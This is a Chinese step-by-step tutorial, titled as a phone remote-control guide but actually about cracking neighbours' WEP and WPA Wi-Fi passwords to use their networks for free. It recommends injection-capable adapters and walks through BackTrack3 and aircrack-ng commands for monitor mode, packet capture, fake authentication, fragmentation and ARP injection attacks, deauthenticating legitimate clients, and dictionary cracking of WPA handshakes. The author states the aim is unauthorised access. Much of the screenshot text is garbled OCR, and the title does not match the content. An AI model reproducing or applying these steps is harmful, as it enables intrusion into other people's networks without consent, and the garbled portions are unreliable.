手机遥控电脑教程

1、第一章引言近些年无线技术发展迅速，越来越多的用户开始使用无线网络，最近新 搬到一小区没有安装网络，后面想到以前出差时在机场用过无线网络，小区内是否也有无线网络呢？随便一搜，果然有几个无线网络信号，于是打起了免费蹭网 的主意，但信号最好的几个网络的 WEP或WPA密码成为了一个门坎，于是在 公司上网查到相关资料，通过几天的学习+实践，终于破解了小区内的几个无线 网络。破解过程中虽然有了各位前辈的经验，但一些前辈的经验过于笼统、专业，细节的地方比较少。我就是在破解过程中走了不小弯路， 还好本人学习和总 结能力还可以（谁扔的鸡蛋），现主要就自己破解过程中的一些注意事项和细节 从头介绍无线网络的破解过

2、程。本文只是对前辈们经验的一点补充，我的文章离不开前辈们的经验。套用最新的流行语:）感谢anywlan 论坛、感谢 haohamaru 、感谢 zero 老大、 Ion gas老大、感谢ggdlyg、感谢liyg、感谢所有帮助我的朋友、感谢 cctv、 感谢mtv 第二章破解前的准备一、 无线网络加密的方式和破解方法原理（看不懂没关系）1、 WEP加密-破解方式：收集足够的Cap数据包（5万以上15万），然后使用aircrack破解。可以在无客户端情况下采用主动注入的方式破解2、WPA加密-破解方式：收包含握手信息的 Cap数据包，然后使用 aircrack 破解。必须在合法的客户端在线的情况

3、下抓包破解。可主动攻击合法客户端使其掉线，合法客户端掉线后再与 AP重新握手即可抓到包含握手信息的数据包。 或可守株待兔等待合法的客户端上线与 AP握手。二、硬件准备、网卡选择工先利其事，必先利其器。一个好的无线网卡可以大大提高破解的效率，少走很多弯路，笔者之前就是没有一个好的无线网卡连 WEP加密都没破开一个，后面换了网卡很快搞定。1、网卡芯片选择现在主流的无线网卡芯片有以下四个品牌：In tel Pro 、RaLi nk、 Broadcom 、Atheros 。In tel芯片主要集成在迅驰系统中，市场上很多主流的迅驰笔记本电脑 都装的这种芯片的无线网卡，遗憾的是现在主流的破解工具 Bac

4、kTrack3对 In tel芯片支持不是太佳。RaLink、Broadcom、Atheros 系列大部份芯片 BackTrack3 支持较好，具体支持的型号可以参考本站相关的帖子。比较有代表性的是芯片型号是 Realtek RT73 和RaLink 2500 ，坛子里使用的人最多，完美支持注入攻击。本 站就有销售采用RT73芯片的无线网卡。2、无线网卡接口方式的选择无线网卡主要有MINI-PCI内置型无线网卡（迅驰系列）、台式机专用 的PCI接口、笔记本电脑专用的 PCMICA接口、USB无线网卡几种形式。推荐使用USB接口无线网卡，支持VM虚拟机下使用。其他几种接口 都不支持虚拟机下使用。

5、台式机专用的PCI接口无线网卡有较多可以外接天线的型号供选择。外接天线可以加强信号，信号的强度是破解成功与否的关健。这是笔者印象最深刻 的经验，笔者就是把手提电脑搬到厨房才把一个顽固”的无线AP给破解的，这是笨办法，手中暂时没有信号好的网卡，所以一个信号好的网卡才是正道。下面推荐三个USB接口无线网卡：LINKSYS WUSB54G v.4 - RT2571芯片，注意要是 V4版的，而且不是 LINKSYS WUSB54GS 型号，GS 型所用芯片不同。LINKSYS WUSB54G v.4淘宝上有改装过可以外接天线的卖，加上一个高DBI的天线，肯定很爽。笔者现在用的就是这个没有改装的，下一步

6、打算再入手一个改装的，加个7DBI的天线。Sparklan （ 速连）WL-685R - RT73 芯片Sparkla n （ 速连）WUBR-101 - RT73 芯片三、破解软件的选择1、WINDOWS 系统软件Win AirCrack 下载地址如下：http:/www.dem on /dow nload/wireless/aircrack/Wi nAircrackPack.zipWINDOWS下的破解软件，更新很慢，支持的网卡型号少，不推荐使 用，具体的破解步骤可以参考网上相关WINDOWS下破解的相关文章。2、Linux 系统很大黑客工具都在Linux系统下有很好支持，

7、破解无线网络的Linux系统有 BackTrack、wifiway 等 Linux LIVE CD 。BackTrack 是基于Slackware 和SLAX的自启动运行光盘，它包含了 一套安全及计算机取证工具。它其实是依靠融合Auditor Security Lin ux 和WHAX （先前的Whoppix） 而创建成的。其中包含 AirCrack等无线网络破解 工具，当然无线网络破解只是这个 CD的一小部份功能。本文后面的介绍以本BackTrack3下操作为主。Wifiway 或其它Linux LIVE CD 下的破解可以参考 BackTrack3 的操作。四、软件准备BackTrack

8、CD 下载。BackTrack最新的版本是3.0版，网上很多无线 网络的破解教程都是以2.0版为基础的，那是因为BackTrack3是去年底才更新， 支持更多的无线网卡，建议下载。光盘版：/bt3b141207.isoU盘版：http:/backtrack.mirrors.sk yn et.be/pub/backtrack/bt3b141207.rar建议使用迅雷下载。我使用的光盘版。BackTrack3光盘下载后可以直接刻录使用，也可以在 VM虚拟机下使 用。下面介绍如何设置使BackTrack3光盘可以启动虚拟机，从而实现在虚拟机 上破

9、解无线网络。1、安装VMware Workstation ，然后建立一个虚拟机，虚拟机配置为 典 型”客户机操作系统为Linux，版本为Other Linux 2.6.x Kernal ”虚拟机 名称和位置自便，网络连接如果想通过主机的网卡共享上网的话， 选择使用桥接 网络，磁盘大小建议分配不少于3G （后面用到的是bt3的real安装，就是全功能安装，所以空间要比较大）;2、对刚建立的虚拟机设置进行编辑，主要是对 CD-ROM进行编辑，选 择使用ISO镜像”找到BT3光盘镜像ISO文件所在的位置，然后确定；效果如图：设备持要巳内存256 ME星）CB-EOM ODE.使用文件F:b3bM12

10、07让*二1 硬盘 GCSI .3_0 GB自动探训閹以太网桥接O1JSB控制要存在彌音频适配署且动探测总旌理器1111!.厂蔺而5I 埸赊泪1内存活捋室要为i封虚拟机分配的肉存大水谨内存大 步值必须是4 MB的倍數”遠虚姒机的內存大屮：烝:MB心A1792A客户机操作丟编逹段的最小値：宠M5丄建这疑犬内存尢小：796 MB超过谄犬小后将合进行内存交换1Anywlan以上只是设置从虚拟机使用光盘启动BackTrack3 ，当然你也可以把BackTrack3直 接安装到你的虚拟机硬盘里。具体的方法见 Asasqwqw的帖子: http:/www.a ny wla =7488&page=5第三章破

11、解过程步骤一、启动 BackTrack3系统现网上主流破解无线网络的 BackTrack3启动方式有以下几种： 直接启动A、USB引导启动-方法：需要制作下载USB版BackTrack3制作相应U 盘，电脑设成从U盘引导。B、光盘引导启动-方法：下载光盘版，刻录光盘，电脑使用光盘引导C、硬盘安装版启动-方法：使用光盘引导，然后安装BackTrack3到硬盘 里。得到可以启动BackTrack3的硬盘版。 虚拟机启动A、虚拟机USB引导启动-方法：需要制作下载 USB版BackTrack3制 作相应U盘，虚拟机设定成从USB引导。B、虚拟机光盘引导启动（推荐）-方法：见第二章节C、虚拟机硬盘安装

12、版启动（推荐）-方法：具体的方法见Asasqwqw 的 帖子下面以虚拟机光盘引导的方式为例来继续后面的讲解 （当然，使用别的 方式启动BackTrack3系统除了启动过程不同，其它基本相同，只有 USB接口 的网卡才支持虚拟机下破解）打开虚拟机电源，选择第一项就可以（或直接20秒后系统自动选择）BT3 Graphics nude(KDE)wnn Persia r BRMJESfr mode (JJode FB nq DHCPAnywlanPress Tab! + edit oplions然后出现一堆乱七八糟的字符，进入直接进入到可爱的图形界面（硬盘安装版要输入用户：root，密码：toor登录

13、后，输入：startx命令才能进入图形界面）。步骤二、想方设法得到破解所需的 Cap数据包文件想方设法得到破解所需的Cap数据包文件，就是不管你用什么方式得至V破解所需的Cap数据包才是正道（去偷去抢也行，呵呵）。对于破解WEP加密和WPA加密所需要的Cap数据包要求是不一样的， 这已经在第二章提到，所以这两种数据包的获取方式也是不一样的。 下面分别就 两种数据包的获得说明（每个步骤后面都有常见问题分析，请参考）：1、关于WEP数据包的获取加载无线网卡驱动打开一个新的Shell窗口（晕，不会不知道什么是 Shell窗口吧？那你 到处找找吧！）输入：ifconfig 查看自己的无线网卡的接口名，

14、我的USB网卡的接口名是rausbO，所以以下的说明都是以我的网卡接口rausbO为例，使用时请按你自己的接口名输入。命令：ifconfig rausbO UP加载无线网卡驱动完成。常见问题：驱动无法加载a、检查你的接口名是否输入错误b、你的网卡芯片是否光盘所支持的激活网卡的Monitor模式命令：airmon-ng start rausbO 6后面的6是你要破解AP的工作频道，根据实际，换成你破解的 AP的实际 工作频道(下同)。这样网卡将启动监听模式，系统将反馈(mode mon itor e nabled)。可以输入命令:iwconfig检查网卡的状态。常见的问题：网卡不能启动正常的监听

15、模式a、请检测你所用的网卡是否是 BackTrack3反支持的。笔者笔记本电脑内置的3945无线网卡在BT3下就不能正常监听，这是由于 BT3下3945的驱动兼 容性所致。Wifiway对3945网卡的支持要好些。b、检测输入的命令是否有误。 开始抓取CAP数据包命令：airodump-ng -w name -c 6 rausbOnterfacerausbOthipsetRalink USBAnywlanrt2570 Bonitor mode enabled)2000-02-2018:22MBCIPHERPWR372ICEShell L Kon soleCH 5P懈 RXQ Beacons#D

16、ata； #/s CHRate Lost Packets ProbesElapsed: 16PSK diink linksysOL其实到了这一步，你的抓包工作已经开始。其中的Data数据量的多少是破解rootbt:airodump-w ciw -c 5 rausbl其中的name是你抓包存储的文件名，你也可以起你自己个性的名字。这样，你的窗口将显示一个工作站，可以看到你要破解的AP的ESSID和MACAP的ESSID和MAC在下一步的攻击中会用到，与 AP连接的合法客户 MAC也可以看到，合法客尸的 MAC在WPA破解中有用。WEP密码的关健。当然如果你的足够的耐心，只要一直开着这个窗口，等上

17、个月，不用你进行下面的操作，你就能收集到足够的数据包（在有客户端活动的 情况下）。为了快速得到需要的大量数据包，你可以进行第四步的攻击操作。当然 你必须一直保持此窗口的打开，才能一直获取数据包。常见问题：请不要关闭这个窗口，直接破解完成。 采用注入攻击的方法使 AP产生大量CAP数据包a、使用 aireplay-ng 来获得 PRGA这是非常关键的一步。为让AP接受数据包，你必须使网卡和AP关联如果没有关联的话，目标AP将忽略所有从你网卡发送的数据包，并发送回一个 未认证消息(DeAuthentication packet) ，IVS数据将不会产生从而导致无法 破解。命令：aireplay-n

18、g -1 0 -e ESSID- APs MAC -h 网卡s MACrausbO$h| - KohiqIv 2*Sending Authentication Request (Open Syste*)Authentication successfulSending Association Request Asso匚tation successful :-)18:24:4310:24:4318:24:43 lfl：24：44 roct(?bt:|rootbt:aireplay-ng0 -e linksysfll -a-h 8M4iMMAM4e4 rausbOWaiting for beacon

19、 framefl, r .：2B) an Channel 5Anywlan如不是以上提示，请检查：a.1、命令是否输入错误a.2、目标AP做了 MAC地址过滤a.3、你离目标AP物理距离太远a.4、对方使用了 WPA加密a.5、网卡不支持注入a.6、网卡、AP可能不兼容，网卡没有使用和AP 一样的工作频道a.7、输入的ESSIDt或MAC拼写有误，请注意检查你可以根据命令反馈消息来判断原因来尝试解决问题，比如获得一个合法的MAC并伪造MAC、使用-o参数设置发送包的个数、设置网卡到一个较低 的rate、到离目标AP更近一点的地方A_A ，但是请注意：如果这一步不能成 功，下面的步骤请不要再尝试

20、，都是无用功！b、使用 fragmentation attack来获得 PRGA这里的PRGA并不是wep key数据，并不能用来解密数据包，而是用 它来产生一个新的数据包以便我们在后面的步骤中进行注入。命令：aireplay-ng -5 -b APsMAC -h网卡SMAC rausbO如果一切顺利，系统将回显Use this packet?输入y回车，将得到一个至关重要的xor文件wxuuou:acTajocm丄匕丄已丄勺丄”ocetiaouaatxjwt闊t” u,.OxODcO:S645ae75fe2&74aSd5BcSS67fba35S4S.E.uJt.g.XH阳阳d3;fe034f

21、27766Je971眈5子c4234e6f99G3hQvw,q, S.#Nq,c-CUT -Jse this paeket ? ysaving thoser packet in replay_src*0220-.cap L8:27:31 Data packet found!LS：27:31 Sending fragmented packet L8：27;31 Got RELAYED packet I!L8:27:31 Trying to get 384 bytes of a keystreamLB:27:31 Got RELAYED packet I IL8:27:31 Trying to g

22、et 1560 bytes of a keystreamLS;27:31 Got RELAYED packet! !sawing keystream in fragniertOJiO- 152731-?ordow you can build a packet with packetfarge-ng out of that 1500 bytes keystreai oot色t：L常见问题：反复出现Use this packet? 的提示以笔者的经验，这是信号不好的问题，请移动的网卡位置。如果是笔记本电 脑可以拿着电脑到房间内别的位置试下。 我有次就是拿着电脑从卧室跑到厨房才 成功的。经验是PRW

23、（信号值）在40以上才能比较容易通过此步。Xor文件的名 字一般和日期时间有关。可以用ls命令查看，请记下产生的文件，以备后面使 用。c、使用 packetforge-ng来产生一个 arp 包可以利用这个PRGA （xor文件）来产生一个注入包，其工作原理就是 使目标AP重新广播包，当AP重广播时，一个新的IVS将产生，我们就是利用 这个来破解。现在，我们生成一个注入包。文件名.xor -w myarp命令：packetforge-ng -0 -a APSMAC -h网卡MAC 5 -k55 -l 55 -y最后的myarp是生成的注入包文

24、件名，可以取你自己个性的名字。Anywlan系统回显： Wrote packet to: myarp18:33:56 Got RELAYED packet!16:33:56 Trying to get 1S00 bytes of a keystream18:33:56 &ot RELAYED packet!1Saving keystream in fragment-0220-l3356.xorNow you can build a packet with packet fo勺 e-ti 号 out of th a t 153 bytes keys tearnr ootb t: -# packe

25、tfcrg&ng -d vWB -h &報现勺|游(1鮒134 七 那 3.255.255,255為5.2勺5.255.25 *y fragment-0220-133356.xor -w myarpwrote packei tc： myarprootbt:t常见问题：-l千万不要写成-1 了，是L的小写，笔记就犯了这个低能的错误，差点卡在这步。d、注入ARP包命令：aireplay-ng -2- myarp -x 1024 rausbO读取上面生成的arp文件，发包攻击。其中，-x 1024 是限定发包速度，避免网卡死机，我选择的是1024，你也可以放大数值。Saving keystreaa

26、in fragment-e22G-1933564xnrNow you can build a packet with paeketfofge-ng out of that 1560 bytes keystreaircotbt：H packetforge-ng -0 -a 肛，M：孔：若 JQ:2B -h 护.:04 -k 5.255 -y fragment-0220-183356.xor -w myarpWrote packet to； rprootbt:aireplay-ng -2 -r tyarp -x 1024 rauabflNo source Hal -h)

27、 sptlfled. kiin th6 device (MAftMMMKt94)Size: 68, FromOSj f), ToDS: 1 (WEP)BSSID = L-j.J:2BDest, MAC = FF:FF:FF：FF:FF:FFSource MAC = 陀总“E；4:04Anywlan0x0060:0xQ910:6k982G:GX093O:0x0040;0B41 B2D10016b61f90?bId 16庞抽b期4ffff ffffffff8001973aa700172e136bfc7a a33c121c16cea6bd16576efea61e4db9 82cdla IfcC34l

28、b96lelfS4aa79bblf9a 2cac IL I J L I:k Z j v _.1】-,D4p.Dse this packet ?谓系统提示： Use this packet?输入y回车攻击开始。涨?这时候回头看下第你一直打开的抓包窗口， Data数据是不是飞速上Anywlan9,.二，JC：2k 飯；匕.：pAO：0A 66：； T 3L: 3273543J940002-2013:36nsWOata4CHMBEMC22U390256454SWEP4&614 e654,WPA210e6S4.WPAShell -BSSIDstationpwfnsoleASTATIONJlH同1933

29、:55Na answer, repea tint.18:33:55Sending fragmented pa19:33:56Got RELAYED packet!18:33:56Trying to get 384 byt Got RELAYED packet!IS:33:56IS33:56Trying to get 1500 by1933:56Got RELAYED packet!Saviny keysin fragitent-02Mow yau tan build awithShell - Konsole ,B 两嫁扣迁rootbt: -# aircrack-nq -z -b C ? 5、.

30、期 ciw-+|capA . .:&是破解成功的界面:2、WPA数据Cap破解命令：aircrack -ng password.txt -b APs MAC n ame*.capPassword.txt是你事先准备好的字典。WPA密码破解必须使用字典破解模式。技巧：可以在windows下使用下载的字典工具生产字典，再在BackTrack3下拷贝到/root 下（aircrack 默认的工作目录在/root）。请确认你的cap包是否包含有握手验证信息。如下图显示：WPA （1han dshake)Shell * Konvolerootbt:aircrack-ng -w password.txt psk+Opening psk-Ol.ca